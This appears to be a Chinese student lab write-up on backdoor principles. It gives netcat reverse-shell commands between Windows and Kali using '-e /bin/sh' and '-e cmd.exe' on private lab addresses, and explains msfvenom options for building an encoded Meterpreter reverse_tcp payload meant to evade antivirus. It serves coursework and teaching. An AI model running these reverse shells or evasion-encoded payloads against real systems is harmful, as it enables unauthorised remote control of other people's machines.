网络对抗技术-Exp2-后门原理与实践 20181314

一、实验内容

1.使用netcat获取主机操作Shell,cron启动

Windows获得Linux Shell

在Windows下使用ipconfig查看本机IP

win+r 输入cmd,打开监听 nc -l -p 1314

在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序

Windows成功获得kali的shell,利用lswhoami指令查看相关信息
在这里插入图片描述
Linux获得Windows Shell

在kali中使用ifconfig查看IP

打开监听nc -l -p 1314

在Windows中反弹连接kali,nc -e cmd.exe 192.168.121.133 1314

kali成功获得Windows的命令提示,可运行指令,如dir,ipconfig

在这里插入图片描述在这里插入图片描述
使用nc传输数据
Windows下监听1314端口,nc -l -p 1314

kali反弹连接到Windows的1314端口,nc 172.16.214.132 1314

连接建立成功,双方可以相互传输数据
在这里插入图片描述
Meterpreter

  • 后门就是一个程序。

  • 传统的理解是:有人编写一个后门程序,大家拿来用。后来有人编写一个平台能生成后门程序。这个平台把后门的

     基本功能(基本的连接、执行指令),
     扩展功能(如搜集用户信息、安装服务等功能),
     编码模式,
     运行平台,
     以及运行参数
     全都做成零件或可调整的参数。用的时候按需要组合,就可以生成一个可执行文件。
    
  • 典型的平台就包括有:

intersect
Metaspolit的msfvenom指令
Veil-evasion
在下面的任务三中我们就用到了Metaspolit的msfvenom指令
  • 参数说明
-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
-x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。
-e 使用的编码器,用于对shellcode变形,为了免杀。
-i 编码器的迭代次数。如上即使用该编码器编码5次。
-b badchar是payload中需要去除的字符。
LHOST 是反弹回连的IP
LPORT 是回连的端口
-f 生成文件的类型
>输出到哪个文件

二、实验内容

任务一:使用netcat获取主机操作Shell,cron启动
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值